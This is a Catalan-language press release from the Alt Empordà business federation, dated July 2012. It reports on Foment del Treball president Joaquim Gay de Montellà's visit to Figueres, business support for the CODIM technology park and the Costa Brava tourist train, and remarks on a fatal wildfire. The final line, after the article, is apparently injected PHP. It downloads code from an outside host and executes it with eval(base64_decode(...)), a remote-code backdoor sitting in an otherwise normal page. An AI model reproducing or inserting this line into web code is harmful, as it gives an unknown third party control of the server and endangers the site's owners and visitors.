Fae - Federació Alt empordanesa d'empreses

  • Increase font size
  • Default font size
  • Decrease font size

Trobada del presidente de Foment del Treball, Joaquim Gay de Montellà, amb els representants dels empresaris a Figueres

Els empresaris donen suport als projectes per la innovació i el turisme de qualitat a l’Alt Empordà

  • El Parc Tecnològic CODIM continua com el projecte de futur més vertebrador de la comarca
  • El tren turístic Costa Brava Figueres-Portbou contribuirà a la desestacionalització del turisme de l’Alt Empordà

Figueres, 24 de juliol de 2012

El president de Foment del Treball, Joaquim Gay de Montellà, ha compartit amb els representants de la Federació Altempordanesa d’Empresaris (FAE) els principals reptes i objectius per millorar l’entorn i facilitar el desenvolupament de la activitat econòmica i del teixit productiu de la comarca, amb oportunitats que passen pel desenvolupament del parc tecnològic i iniciatives de desestacionalització de l’oferta turística, com ara el Tren Turístic Costa Brava. Gay de Montellà s’ha reunit amb el president de la Federació d’Organitzacions Empresarials de Girona (FOEG), Jordi Comas; i amb el president de la FAE, Lluís Fita; entre d’altres. Coincidint amb l’incendi devastador que assola el territori, Gay de Montellà s’ha mostrat confiat en “el desenvolupament òptim de la campanya turística” ja que, ha dit, “el potencial i l’atractiu turístic de l’Empordà i tota la costa gironina se sabran sobreposar a aquesta desgràcia lamentable”.

Gay de Montellà, acompanyant pels representants empresarials gironins i alt empordanesos, ha visitat el centre de comandament del dispositiu de lluita contra els incendis, on ha manifestat al “l’agraïment dels empresaris per l’esforç de tots els serveis d’emergències i els cossos de seguretat per vetllar per la integritat de la ciutadania”. Gay de Montellà ha lamentat que el foc hagi provocat víctimes mortals i ha mostrat el condol de l’empresariat. En aquest sentit, el president de Foment ha subratllat que “la feina esforçada i professional dels serveis d’emergències salva moltes vides”.

Impuls al parc tecnològic CODIM

La diversificació de la base productiva és un dels objectius principals que l’Alt Empordà té plantejats: la diversificació econòmica ha de prioritzar aquells sectors productius de major valor afegit, intensius en coneixement i que potenciïn la recerca i la innovació. En aquest sentit, els empresaris s’han mostrat confiats en l’impuls que amb l’Ajuntament de Figueres s’està donant en els últims mesos al projecte per parc tecnològic CODIM (Comunitat de desenvolupament d’Innovació Mediambiental), dedicat principalment a la R+D+I en temes mediambientals i energètics.

Els empresaris defensen un parc tecnològic de model europeu, impulsat des del món empresarial amb col·laboració directa amb les administracions locals i universitats. Els empresaris alt empordanesos veuen en el CODIM un projecte de futur per la qualitat de vida de la comarca, les infraestructures actuals i les programades: la proximitat de Barcelona i Perpinyà ofereix moltes possibilitats en un entorn idoni per a aquest parc científic.

Tren turístic Costa Brava

Els empresaris alt empordanesos aposten també per iniciatives que permetin una oferta turística sostinguda durant tot l’any, més enllà de les campanyes més fortes d’estiu. En aquest sentit, la posada en funcionament del Tren Turístic Costa Brava –un vapor que uneix Figueres i Portbou- és una oportunitat per enriquir l’oferta turística i generar nova activitat econòmica.

La Federació Altempordanesa d’Empresaris, que va constituir-se l’any 2005, és una organització patronal que defensa i agrupa els interessos comuns de petites empreses i gremis del teixit empresarial de l’Alt Empordà. Es tracta de l’organització empresarial intersectorial de la FOEG a la comarca –i per tant, integrada a Foment- i bona part de les seves actuacions tenen l’objectiu d’apropar als seus associats les diferents iniciatives i projectes en favor de l’empresariat català que s’articulen des de l’entramat d’associacions empresarials de Foment.

 

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));